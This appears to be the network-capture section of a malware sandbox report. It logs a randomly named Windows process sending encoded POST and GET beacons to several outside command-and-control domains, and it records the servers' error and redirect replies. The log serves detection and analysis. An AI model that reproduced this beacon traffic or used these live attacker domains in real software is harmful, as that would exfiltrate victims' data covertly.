Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:20.778458118 CEST | 539 | OUT | GET /wjz2/?2rul-=Ze+HptNr85yw14c+us2AC2dw1a7i9e00/foFqz1kUabDhzphc/VO6YYTNbrnHL/5cJOwek587J0vYmBCPQ4ypnI0Vgcg70qX2rjEYXT5uSwLlvVTAHZgxGM=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.theawareness.shop
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:56:21.046061993 CEST | 949 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:21 GMT
                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 15
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTOrbkQajhkEIZe8L0fq7TYb7oiBLEAKXHop%2BJGmuUO8lrEt5qCs2FlvzCCBr3d40gs%2Fi0UMa0ki8HcGDjZ5oxRUEkx83toLdzqYCxCThQihTD%2F12zVr0qQsRNqIcagvui4MTxEYyZ0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73428a284372ab-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32
                                                                                                                                                                                                                        Data Ascii: error code: 502


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.11.20 | 49837 | 104.21.64.124 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:26.271603107 CEST | 820 | OUT | POST /rfuo/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.gokulmohan.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.gokulmohan.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.gokulmohan.online/rfuo/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=KvFu5WPJRpgug7tvUZenUuPDOhZfY3WokgeDzlAAPXB9sb/Y50OGgL3yIEkmXvP8LuE7uIOVcZdGI3zIP9Qel2hH91MbSpbTO3L4ACSsrDKjzOi7yiRjKWcBglDYpZbjVzXdFQdrvgb+U5FngQP57Jc9eEp4OZsash5VjNr7FVKW+A44qUkIk9WlVoKWxOXJTA==
Oct 23, 2024 18:56:26.821609020 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:26 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XVKLD69Hnyy%2BdZ7o1AFUVnaVUCHjQy1SxSeZsk5%2F50Lk6bY9tMRMOL6CEJM8cmf%2BY5CQeGhezmipc6d6Y5fS02CDWSTn%2Fhc9RmLY%2FWF1oqAMpzqGR2fbeyQacGIbLCDJ%2BT2YFDeV%2Bt4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7342ac88594314-EWR
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95470&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 23, 2024 18:56:26.821682930 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.11.20 | 49838 | 104.21.64.124 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:28.903660059 CEST | 840 | OUT | POST /rfuo/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.gokulmohan.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.gokulmohan.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.gokulmohan.online/rfuo/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=KvFu5WPJRpguib9vYeKnF+PCBBZfWXWsknWDzkVbPFl9v/7Y41OGpb3yAkkZZPPNLuJRuNuVcZhGIzjIPOofkmhZjVMZNZbTO3L4ACGWrDCjz/y7zGFgVmcOoFDYtZbZVzWKFSpBvjz+U7tnhBP21Jc/aEpqDrNovjB4se77akXi/W1i3mQsnuKXRYz+zMWSODssaDR03uUf7zJbHpRVbTA=
Oct 23, 2024 18:56:29.477283955 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:29 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eiVmhfPeYp1S7Ho30%2BJwqzBfwRuAQvSoMWOfrMHRV8rTfCaiYrc7ViKBM8xQUTH1s3btQNS1DDF25nzL%2BZO%2BIuUyey%2F%2BpS2pvectLPiAT48uw0ptVfSfSuMD1Pfyuf08iWFw73QDnlw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7342bcfab64338-EWR
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94602&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.20 | 49839 | 104.21.64.124 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:31.527971029 CEST | 1289 | OUT | POST /rfuo/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.gokulmohan.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.gokulmohan.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.gokulmohan.online/rfuo/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:56:32.102612972 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:32 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOO3Xz7s0rOdztK0PpduxCIKD0KT1fF6nhIQHP5HjXUVae93kNcLcDhxFGpGgMI9Q1w25%2Fw4gVSUl85a73xVW9oaegZW4UbPMYRzwXMR8bpcxGOdQ5l7jYKrg2CPFqgclVAZnrEDuUg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7342cd5df1726b-EWR
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94252&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7989&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.20 | 49840 | 104.21.64.124 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:34.151449919 CEST | 539 | OUT | GET /rfuo/?Hh=g6BlO&2rul-=HttO6gilRPhQm5AaUYCTEe/GFzQ3JRW7tnq3sC1VQlloj67/9n3YrtONKlQmdJDOXt5dm9a5cNA5akyMA8hzjxd/lkJNPaGIP3HcLzqJj36WiuTl2EhOSjI= HTTP/1.1
                                                                                                                                                                                                                        Host: www.gokulmohan.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:56:34.711076021 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:34 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTmoVit02TFPilnQKTr2EByKt%2B1zJLpLTJDBT541C%2BgYrd1DHfxQ67%2F%2BIdgSzSMvjXBSXfRmD%2BCOM3lbgWuvhOshphDRlGDLfZaFs8ZonY0xaW36udXnGqsoK1vQu%2BXjskTSrGk5Gs0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7342ddcdf30cc8-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95266&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Ascii: c9b<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /rfuo/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; bac
Oct 23, 2024 18:56:34.711146116 CEST | 1289 | IN | Data Ascii: kground:#eee; color:#000; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; margin-bottom:.4em; } h1 span { font-size:60%; color:#666; font-weight:normal; } table { border:none; border-collapse: collapse; wi
Oct 23, 2024 18:56:34.711201906 CEST | 1289 | IN | Data Ascii: <td>django.views.static.serve</td> </tr> </table> </div> <div id="info"> <p> Using the URLconf defined in <code>portifolio.urls</code>, Django tried these URL patterns, in this order:
Oct 23, 2024 18:56:34.711244106 CEST | 290 | IN | Data Ascii: </p> </div> <div id="explanation"> <p> You’re seeing this error because you have <code>DEBUG = True</code> in your Django settings file. Change that to <code>False</code>, and Django will display a standard
Oct 23, 2024 18:56:34.711277008 CEST | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.11.20 | 49841 | 142.251.40.243 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:40.033432961 CEST | 817 | OUT | POST /xb3p/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.3bbfibre3app.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.3bbfibre3app.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=zFuaZWt8f6NJ2w4qi5p5me/FDRDvZPfUXj+FdNkixc022Hj9iaW92suNctFGxl4bBMR27nru1QYSHwX8IXr/lNVgMhSNMuYo5pgkJGdY+85fbInF6PgKyMw4K6qNisv+9QlHugfKWf+/q/by+0slEWFEL+tdkC+gwXYJ6Pp8y/BOraJVubDkEiodeFI3TPQSOw==
Oct 23, 2024 18:56:40.173388958 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:40 GMT
                                                                                                                                                                                                                        Location: https://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.11.20 | 49842 | 142.251.40.243 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:42.666627884 CEST | 837 | OUT | POST /xb3p/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.3bbfibre3app.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.3bbfibre3app.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=zFuaZWt8f6NJ2RoqhYp52O/GIxDvQvfYXjyFdPJ/xqE22iH9hbW93suNXNEM1l4qBMtU7nnu1QMSHzD8IgX+m9VuABSPTeYo5pgkJAxy+8xfY5XF7uh47swnN6qN0cv69QkSuljwWdG/q6ny+lsmfGFeUusMlHGo4mgG8NAuwdh2jsEPzp3AHx0va1xfRNRJT4pEmwb1OyXnewOCzXpIEL8=
Oct 23, 2024 18:56:42.823436022 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:42 GMT
                                                                                                                                                                                                                        Location: https://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.20 | 49843 | 142.251.40.243 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:45.291646957 CEST | 5156 | OUT | POST /xb3p/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.3bbfibre3app.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.3bbfibre3app.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Data Ascii: 2rul-= [TRUNCATED]
Oct 23, 2024 18:56:45.291729927 CEST | 2830 | OUT |
                                                                                                                                                                                                                        Data Ascii: TG0maC84U3/4bF2JV4/AlGiVR9cvMFOa9qMvBSm4U6mIRLP7Sziqqv3DvRD1gIQ7YGe4dFEZtMFp4NuMfmUQHBRKg7FOpttjWzfYHhHJkXqZOl6jzLFW9tFwMABfsWOlxwGAOm0g3d1e7O5fnOG8agJ1VjSLyAI7A3Fu+vTgywYRx9DoWq0mnD9E6O/T/JfJGYx8YOCOh+CzIqUzIUKxZrQS4AB52sI7rSWOwaWJWEAHDF0HNDc
Oct 23, 2024 18:56:45.463459015 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:45 GMT
                                                                                                                                                                                                                        Location: https://www.3bbfibre3app.net/xb3p/
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.11.20 | 49844 | 142.251.40.243 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:47.912940979 CEST | 538 | OUT | GET /xb3p/?2rul-=+HG6aiFxTvlSzQoIs9ZJ3PSkAiypA9aaBhm9bacr778ozHX/qp3/mrPcWfQQ4m8pKd5uzW3Q1BNoTzb8AReS/5N/dAP+OtFAus01fnFx169lP7D5+vQ5ltg=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.3bbfibre3app.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:56:48.032459021 CEST | 544 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:47 GMT
                                                                                                                                                                                                                        Location: https://www.3bbfibre3app.net/xb3p/?2rul-=+HG6aiFxTvlSzQoIs9ZJ3PSkAiypA9aaBhm9bacr778ozHX/qp3/mrPcWfQQ4m8pKd5uzW3Q1BNoTzb8AReS/5N/dAP+OtFAus01fnFx169lP7D5+vQ5ltg%3D&Hh=g6BlO
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                        53 | 192.168.11.20 | 49845 | 194.58.112.174 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                        Oct 23, 2024 18:56:53.938342094 CEST | 823 | OUT | POST /3ld1/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.lichnyyrost.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.lichnyyrost.online/3ld1/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:56:54.191987038 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:54 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Encoding: gzip


                                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
